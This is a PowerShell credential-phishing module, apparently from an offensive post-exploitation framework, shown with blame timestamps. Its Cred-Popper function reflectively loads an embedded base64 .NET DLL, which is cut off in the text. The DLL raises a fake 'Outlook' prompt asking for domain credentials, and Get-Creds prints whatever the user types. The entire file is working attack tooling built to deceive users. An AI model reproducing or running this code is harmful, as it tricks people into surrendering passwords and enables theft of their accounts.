2018-10-01 12:32:24 +00:00
|
|
|
|
function Cred-Popper($title="Outlook", $caption="Please Enter Your Domain Credentials", $minlengthpassword=1) {
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
|
|
$scriptblock = @"
|
2018-10-01 12:32:24 +00:00
|
|
|
|
`$PS = "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aQAcBRAAcQAcBRAAkQAcBQYAoQCmAiUAoQC5AiUAqQC7BSkAgQAcBQEAgQB7AjsAsQBeBEEAuQDYBEYAeQBlBEkAqQBuBE0AeQAcBQYACAAEAFoACAAIAFoACAAMAFoACAAoAF8ACAAsAGQACAAwAGkACAA0AG4ACAA4AHMACAA8AHgACABAAH0ACABEAIIACABIAIcACABMAIwACABQAJEACABUAJYACABYAJsACABcAKAACABgAKUACABkAKoACABoAK8ACABwALQACAB0ALkACAB4AL4ACAB8AMMACACAAMgACACEAM0ACACIANIACACMANcACACQANwALgALACUBLgATAC4BLgAbAE0BLgAjAFYBLgArAGcBLgAzAGcBLgA7AGcBLgBDAFYBLgBLAG0BLgBTAGcBLgBbAGcBLgBjAIUBLgBrAK8BgwBzAF8AFwDhABoAMACIBHkERgEDAKQEAQAEAQUAOgICAASAAAABAAAAAAAAAAAAAAAAAPUEAAACAAAAAAAAAAAAAABRAHICAAAAAAMAAgAEAAIABQACAAAAAHJlc2VydmVkMQA8TW9kdWxlPgBFUlJPUl9DQU5DRUxMRUQARVJST1JfTk9UX0ZPVU5EAFJFUVVJUkVfU01BUlRDQVJEAElOQ09SUkVDVF9QQVNTV09SRABNQVhfUEFTU1dPUkQAVkFMSURBVEVfVVNFUk5BTUUAQ09NUExFVEVfVVNFUk5BTUUAS0VFUF9VU0VSTkFNRQBNQVhfVVNFUl9OQU1FAEVSUk9SX0lOVkFMSURfQUNDT1VOVF9OQU1FAFJFUVVJUkVfQ0VSVElGSUNBVEUAQUxXQVlTX1NIT1dfVUkAY3JlZGl0VUkAUEFTU1dPUkRfT05MWV9PSwBTRVJWRVJfQ1JFREVOVElBTABNQVhfRE9NQUlOAEVSUk9SX05PX1NVQ0hfTE9HT05fU0VTU0lPTgBFWFBFQ1RfQ09ORklSTUFUSU9OAENSRURVSV9JTkZPAEVSUk9SX0lOU1VGRklDSUVOVF9CVUZGRVIARVJST1JfSU5WQUxJRF9QQVJBTUVURVIATk9fRVJST1IAUkVRVUVTVF9BRE1JTklTVFJBVE9SAGNyZWRpdFVSAEVYQ0xVREVfQ0VSVElGSUNBVEVTAEVSUk9SX0lOVkFMSURfRkxBR1MAQ1JFRFVJX0ZMQUdTAEdFTkVSSUNfQ1JFREVOVElBTFMAVVNFUk5BTUVfVEFSR0VUX0NSRURFTlRJQUxTAEVSUk9SX0JBRF9BUkdVTUVOVFMARE9fTk9UX1BFUlNJU1QAQ3JlZFVJUHJvbXB0Rm9yQ3JlZGVudGlhbHNXAFNIT1dfU0FWRV9DSEVDS19CT1gAdmFsdWVfXwBtc2NvcmxpYgBBcHBlbmQAbWF4UGFzc3dvcmQAbWlubGVuZ3RocGFzc3dvcmQAdGl0bGUAZ2V0X1VzZXJEb21haW5OYW1lAGdldF9Vc2VyTmFtZQBtYXhVc2VyTmFtZQB1c2VyTmFtZQB0YXJnZXROYW1lAFZhbHVlVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJ
|
|
|
|
|
|
`$DllBytes = [System.Convert]::FromBase64String(`$PS)
|
|
|
|
|
|
`$Assembly = [System.Reflection.Assembly]::Load(`$DllBytes)
|
|
|
|
|
|
`$sessionstate.log = [CredentialsPrompt]::CredPopper("$title", "$caption",$minlengthpassword)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
"@
|
|
|
|
|
|
|
|
|
|
|
|
$global:sessionstate = [HashTable]::Synchronized(@{})
|
|
|
|
|
|
$sessionstate.log = New-Object System.Collections.ArrayList
|
|
|
|
|
|
|
|
|
|
|
|
$HTTP_runspace = [RunspaceFactory]::CreateRunspace()
|
|
|
|
|
|
$HTTP_runspace.Open()
|
|
|
|
|
|
$HTTP_runspace.SessionStateProxy.SetVariable('sessionstate',$sessionstate)
|
|
|
|
|
|
$HTTP_powershell = [PowerShell]::Create()
|
|
|
|
|
|
$HTTP_powershell.Runspace = $HTTP_runspace
|
|
|
|
|
|
$HTTP_powershell.AddScript($scriptblock) > $null
|
2018-10-01 12:32:24 +00:00
|
|
|
|
$HTTP_powershell.BeginInvoke() > $null
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
|
|
echo ""
|
|
|
|
|
|
echo "[+] Cred-Popper started in background runspace"
|
|
|
|
|
|
echo ""
|
|
|
|
|
|
echo "Run Get-Creds to obtain the output, when the user enters their credentials"
|
2018-10-01 12:32:24 +00:00
|
|
|
|
echo ""
|
|
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
|
function Get-Creds {
|
|
|
|
|
|
echo ""
|
|
|
|
|
|
"[+] Cred-Popper data:"
|
|
|
|
|
|
echo $sessionstate.log
|
|
|
|
|
|
}
|
